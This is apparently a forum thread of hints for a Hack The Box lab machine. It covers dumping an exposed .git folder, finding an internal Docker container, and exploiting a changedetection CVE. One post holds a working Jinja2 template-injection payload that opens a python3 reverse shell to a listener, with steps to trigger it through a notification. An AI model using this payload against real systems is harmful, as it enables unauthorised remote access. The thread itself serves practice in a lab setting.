is the changedetection web app the ip and port that only gives a 404 ?
it probably broke and didn’t download the folder or your not check the folder that it needs to be downloaded in.
This is what i did to make it work because i also received a timeout so it wouldn’t download the full git folder.
./git-dumper/git_dumper.py http://shop.trickster.htb/.git/ gittrickster -j 12 -r 5 -t 5
1 Like
thanks, got the direcotry now…
1 Like
how do you find the changedetection ? i can only find a port but it only gives a 404
The abs path of bash is /usr/bin/bash . You can revise the payload in notification template which upload from the exploit.
Scan internal docker network. Guess the IP address. There’s more than one container. The one always gives 404 is a rabbit hole
1 Like
run arp -an to get all the known IPs in the ARP table. This is how I got 172.17.0.2
1 Like
Thanks i did another trick
check ifconfig then check ip of docker and then just ping ip 1 up and if it respond try to curl to the default port
so for example: docker port is 127.0.0.1 then just ping 127.0.0.2 if it get a response do the curl port check. if not just go to 3 and on
this script doesn’t upload the notification shell and when i update it my self it doesn’t get triggerd somehow.
any hint here to escalate privileges?
what an annoying and frustrating box again!
the root CVE isn’t working at all it’s not placing the rev shell and when i place it my self it’s not getting triggered.
Carefully read all logs from the container application and edit the exploit accordingly.
Also you need to craft a dummy notification URL. Check the documentation for it.
Hello pls how did you get the version number
Ok, got it now 
for the people that has issues.
The notification body isn’t added with the CVE script so had to do it myself.
listen_ip="your_ip"
listen_port=9003
print(f"""
{{% for x in ().__class__.__base__.__subclasses__() %}}
{{% if "warning" in x.__name__ %}}
{{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}
{{% endif %}}
{{% endfor %}}
""")
net cat on 9003
go to the changedetection website and edit the just added website → notifications add notification url test - get://kali_ip:9001/test
the url is just a python http.server
then fill in a notification title and copy paste the payload that you receive from the script above. then just press the send notification button.
1 Like
how did you find the docker with changedetection?
I’m currently logged in as james - can you give me a hint?
use ifconfig try to find docker interface
1 Like
how was i unable to see this… thank you!
any hint to escape from docker?
Check the linux user files.
It’s much easier than you think
I had trouble using this PoC:
with the other PoC Script and manually triggering the shell by clicking test notification url my shell popped.
getting root was easy though 
1 Like